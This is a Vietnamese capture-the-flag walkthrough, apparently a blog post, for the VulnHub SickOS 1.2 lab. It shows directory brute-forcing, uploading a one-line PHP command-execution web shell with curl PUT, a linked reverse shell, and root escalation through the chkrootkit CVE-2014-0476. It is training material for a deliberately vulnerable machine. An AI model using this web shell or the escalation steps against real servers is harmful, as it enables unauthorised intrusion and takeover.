Hack with RBK 2

Challenge 2: Take control of an unknown Linux machine.

<sốt: SickOS >

Practical Lab: https://download.vulnhub.com/sickos/sick0s1.2.zip  

<Hy vọng không ai đọc post cho vui lúc đi iar>

Tương tự challenge 1, lần này ta vẫn sẽ làm mọi cách để khai thác 1 Linux machine. Khác biệt đầu tiên của lab này so với lab trước là số lượng port mở để có thể khai thác giảm đi đáng kể:

Vì cổng 80 đang mở nên không lãng phí thời gian, sử dụng ngay dirb để tấn công brute-force thư mục để có thể xem web có cung cấp thứ gì đó có giá trị hay không và đừng hỏi tại sao không cố kết nối với port 22 (Xem lại challenge 1):

dirb http://192.168.160.199

Well, web có vẻ thư mục test sẽ cho kha khá thông tin hữu ích:



Well well well, chả có gì giá trị => thử dùng Nikto:

Server: Máy chủ web đang chạy là lighttpd với phiên bản 1.4.28.

/test/: Thư mục cần chú ý

Có thể nói là kết quả nikto này show rất rõ những gì bên developer tạo. => Hãy dùng thử Curl để khai thác folder test: curl -v -X OPTIONS 192.168.160.199/test

  1. PROPFIND: Sử dụng để truy xuất thông tin về một tài nguyên web, chẳng hạn như thông tin về tệp tin, thư mục, và các thuộc tính liên quan.
  2. DELETE: Cho phép xóa một tài nguyên.
  3. MKCOL: Tạo một thư mục mới.
  4. PUT: Cập nhật hoặc tạo mới một tài nguyên.
  5. MOVE: Di chuyển một tài nguyên từ vị trí này đến vị trí khác.
  6. COPY: Sao chép một tài nguyên từ vị trí này đến vị trí khác.
  7. PROPPATCH: Sử dụng để thay đổi các thuộc tính của một tài nguyên.
  8. LOCK: Khóa một tài nguyên, thường được sử dụng trong môi trường WebDAV để tránh sự xung đột giữa các thay đổi cùng một tài nguyên.
  9. UNLOCK: Mở khóa một tài nguyên.

Thư mục cho put => thử UP payload qua put xem:

curl -v -X PUT -d ‘<?php echo system($_REQUEST[‘cmd’]);?>’ http://192.168.160.199/test/stef.php

  • Mọi thứ coi như đã đi đến hồi kết khi có thể thoải mái thực thi mọi lệnh:

=> Có thể tạo kết hợp với Metasploit để khai thác hoặc đơn giản dùng netcat.

Ví dụ với upload reverse shell: https://pentestmonkey.net/tools/web-shells/php-reverse-shell

Tận dụng CVE 2014-0476 – khai thác chrootkit (Chkrootkit là một chương trình dựa trên Unix phổ biến nhằm giúp quản trị viên hệ thống kiểm tra hệ thống của họ để tìm các rootkit đã biết.)

Check:

Well, có thể khai thác bằng cách lợi dụng lỗ hổng hoặc đụng chạm vào /etc/password:

  • Đã tạo thành công pass mới cho root (newpass)
  • Done

Tham khảo thêm: https://sevenlayers.com/index.php/91-vulnhub-sickos-1-2-walkthrough














<Phú ông đi qua phú bà đi lại hãy để cho tôi Khều chút donate: 9987495902 VCB>


Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by WordPress | Theme: Code Blog by Crimson Themes.